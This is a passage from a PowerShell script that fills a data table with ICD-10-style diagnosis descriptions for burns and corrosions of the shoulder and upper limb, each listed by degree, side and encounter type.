subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified shoulder","Burn of first degree of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right scapular region","Burn of first degree of right scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right scapular region","Burn of first degree of right scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right scapular region","Burn of first degree of right scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left scapular region","Burn of first degree of left scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left scapular region","Burn of first degree of left scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left scapular region","Burn of first degree of left scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified scapular region","Burn of first degree of unspecified scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified scapular region","Burn of first degree of unspecified scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified scapular region","Burn of first degree of unspecified scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of first degree of multiple sites of right shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of first degree of multiple sites of right shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of first degree of multiple sites of right shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of first degree of multiple sites of left shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of first degree of multiple sites of left shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of first degree of multiple sites of left shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of first degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of second degree of shoulder and upper limb, except wrist and hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of second degree of shoulder and upper limb, except wrist and hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of second degree of shoulder and upper limb, except wrist and hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right forearm","Burn of second degree of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right forearm","Burn of second degree of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right forearm","Burn of second degree of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left forearm","Burn of second degree of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left forearm","Burn of second degree of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left forearm","Burn of second degree of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified forearm","Burn of second degree of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified forearm","Burn of second degree of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified forearm","Burn of second degree of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right elbow","Burn of second degree of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right elbow","Burn of second degree of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right elbow","Burn of second degree of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left elbow","Burn of second degree of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left elbow","Burn of second degree of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left elbow","Burn of second degree of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified elbow","Burn of second degree of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified elbow","Burn of second degree of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified elbow","Burn of second degree of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right upper arm","Burn of second degree of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right upper arm","Burn of second degree of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right upper arm","Burn of second degree of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left upper arm","Burn of second degree of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left upper arm","Burn of second degree of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left upper arm","Burn of second degree of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified upper arm","Burn of second degree of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified upper arm","Burn of second degree of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified upper arm","Burn of second degree of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right axilla","Burn of second degree of right axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right axilla","Burn of second degree of right axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right axilla","Burn of second degree of right axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left axilla","Burn of second degree of left axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left axilla","Burn of second degree of left axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left axilla","Burn of second degree of left axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified axilla","Burn of second degree of unspecified axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified axilla","Burn of second degree of unspecified axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified axilla","Burn of second degree of unspecified axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right shoulder","Burn of second degree of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right shoulder","Burn of second degree of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right shoulder","Burn of second degree of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left shoulder","Burn of second degree of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left shoulder","Burn of second degree of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left shoulder","Burn of second degree of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified shoulder","Burn of second degree of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified shoulder","Burn of second degree of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified shoulder","Burn of second degree of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right scapular region","Burn of second degree of right scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right scapular region","Burn of second degree of right scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right scapular region","Burn of second degree of right scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left scapular region","Burn of second degree of left scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left scapular region","Burn of second degree of left scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left scapular region","Burn of second degree of left scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified scapular region","Burn of second degree of unspecified scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified scapular region","Burn of second degree of unspecified scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified scapular region","Burn of second degree of unspecified scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of second degree of multiple sites of right shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of second degree of multiple sites of right shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of second degree of multiple sites of right shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of second degree of multiple sites of left shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of second degree of multiple sites of left shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of second degree of multiple sites of left shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of second degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of third degree of shoulder and upper limb, except wrist and hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of third degree of shoulder and upper limb, except wrist and hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of shoulder and upper limb, except wrist and hand, unspecified site","Burn of third degree of shoulder and upper limb, except wrist and hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right forearm","Burn of third degree of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right forearm","Burn of third degree of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right forearm","Burn of third degree of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left forearm","Burn of third degree of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left forearm","Burn of third degree of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left forearm","Burn of third degree of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified forearm","Burn of third degree of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified forearm","Burn of third degree of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified forearm","Burn of third degree of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right elbow","Burn of third degree of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right elbow","Burn of third degree of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right elbow","Burn of third degree of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left elbow","Burn of third degree of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left elbow","Burn of third degree of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left elbow","Burn of third degree of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified elbow","Burn of third degree of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified elbow","Burn of third degree of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified elbow","Burn of third degree of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right upper arm","Burn of third degree of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right upper arm","Burn of third degree of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right upper arm","Burn of third degree of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left upper arm","Burn of third degree of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left upper arm","Burn of third degree of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left upper arm","Burn of third degree of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified upper arm","Burn of third degree of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified upper arm","Burn of third degree of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified upper arm","Burn of third degree of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right axilla","Burn of third degree of right axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right axilla","Burn of third degree of right axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right axilla","Burn of third degree of right axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left axilla","Burn of third degree of left axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left axilla","Burn of third degree of left axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left axilla","Burn of third degree of left axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified axilla","Burn of third degree of unspecified axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified axilla","Burn of third degree of unspecified axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified axilla","Burn of third degree of unspecified axilla, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right shoulder","Burn of third degree of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right shoulder","Burn of third degree of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right shoulder","Burn of third degree of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left shoulder","Burn of third degree of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left shoulder","Burn of third degree of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left shoulder","Burn of third degree of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified shoulder","Burn of third degree of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified shoulder","Burn of third degree of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified shoulder","Burn of third degree of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right scapular region","Burn of third degree of right scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right scapular region","Burn of third degree of right scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right scapular region","Burn of third degree of right scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left scapular region","Burn of third degree of left scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left scapular region","Burn of third degree of left scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left scapular region","Burn of third degree of left scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified scapular region","Burn of third degree of unspecified scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified scapular region","Burn of third degree of unspecified scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified scapular region","Burn of third degree of unspecified scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of third degree of multiple sites of right shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of third degree of multiple sites of right shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right shoulder and upper limb, except wrist and hand","Burn of third degree of multiple sites of right shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of third degree of multiple sites of left shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of third degree of multiple sites of left shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left shoulder and upper limb, except wrist and hand","Burn of third degree of multiple sites of left shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Burn of third degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site","Corrosion of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site","Corrosion of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site","Corrosion of unspecified degree of shoulder and upper limb, except wrist and hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right forearm","Corrosion of unspecified degree of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right forearm","Corrosion of unspecified degree of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right forearm","Corrosion of unspecified degree of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left forearm","Corrosion of unspecified degree of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left forearm","Corrosion of unspecified degree of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left forearm","Corrosion of unspecified degree of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified forearm","Corrosion of unspecified degree of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified forearm","Corrosion of unspecified degree of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified forearm","Corrosion of unspecified degree of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right elbow","Corrosion of unspecified degree of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right elbow","Corrosion of unspecified degree of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right elbow","Corrosion of unspecified degree of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left elbow","Corrosion of unspecified degree of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left elbow","Corrosion of unspecified degree of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left elbow","Corrosion of unspecified degree of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified elbow","Corrosion of unspecified degree of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified elbow","Corrosion of unspecified degree of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified elbow","Corrosion of unspecified degree of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right upper arm","Corrosion of unspecified degree of right upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right upper arm","Corrosion of unspecified degree of right upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right upper arm","Corrosion of unspecified degree of right upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left upper arm","Corrosion of unspecified degree of left upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left upper arm","Corrosion of unspecified degree of left upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left upper arm","Corrosion of unspecified degree of left upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified upper arm","Corrosion of unspecified degree of unspecified upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified upper arm","Corrosion of unspecified degree of unspecified upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified upper arm","Corrosion of unspecified degree of unspecified upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right axilla","Corrosion of unspecified degree of right axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right axilla","Corrosion of unspecified degree of right axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right axilla","Corrosion of unspecified degree of right axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left axilla","Corrosion of unspecified degree of left axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left axilla","Corrosion of unspecified degree of left axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left axilla","Corrosion of unspecified degree of left axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified axilla","Corrosion of unspecified degree of unspecified axilla, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified axilla","Corrosion of unspecified degree of unspecified axilla, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified axilla","Corrosion of unspecified degree of unspecified axilla, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right shoulder","Corrosion of unspecified degree of right shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right shoulder","Corrosion of unspecified degree of right shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right shoulder","Corrosion of unspecified degree of right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left shoulder","Corrosion of unspecified degree of left shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left shoulder","Corrosion of unspecified degree of left shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left shoulder","Corrosion of unspecified degree of left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified shoulder","Corrosion of unspecified degree of unspecified shoulder, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified shoulder","Corrosion of unspecified degree of unspecified shoulder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified shoulder","Corrosion of unspecified degree of unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right scapular region","Corrosion of unspecified degree of right scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right scapular region","Corrosion of unspecified degree of right scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right scapular region","Corrosion of unspecified degree of right scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left scapular region","Corrosion of unspecified degree of left scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left scapular region","Corrosion of unspecified degree of left scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left scapular region","Corrosion of unspecified degree of left scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified scapular region","Corrosion of unspecified degree of unspecified scapular region, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified scapular region","Corrosion of unspecified degree of unspecified scapular region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified scapular region","Corrosion of unspecified degree of unspecified scapular region, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand","Corrosion of unspecified degree of multiple sites of right shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand","Corrosion of unspecified degree of multiple sites of left shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand","Corrosion of unspecified degree of multiple sites of unspecified shoulder and upper limb, except wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of shoulder and upper limb, except wrist and hand unspecified site","Corrosion of first degree of shoulder and upper limb, except wrist and hand unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of shoulder and upper limb, except wrist and hand unspecified site","Corrosion of first degree of shoulder and upper limb, except wrist and hand unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of shoulder and upper limb, except wrist and hand unspecified site","Corrosion of first degree of shoulder and upper limb, except wrist and hand unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right forearm","Corrosion of first degree of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right forearm","Corrosion of first degree of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right forearm","Corrosion of first degree of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left forearm","Corrosion of first degree of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left forearm","Corrosion of first degree of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left forearm","Corrosion of first degree of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified forearm","Corrosion of first degree of unspecified 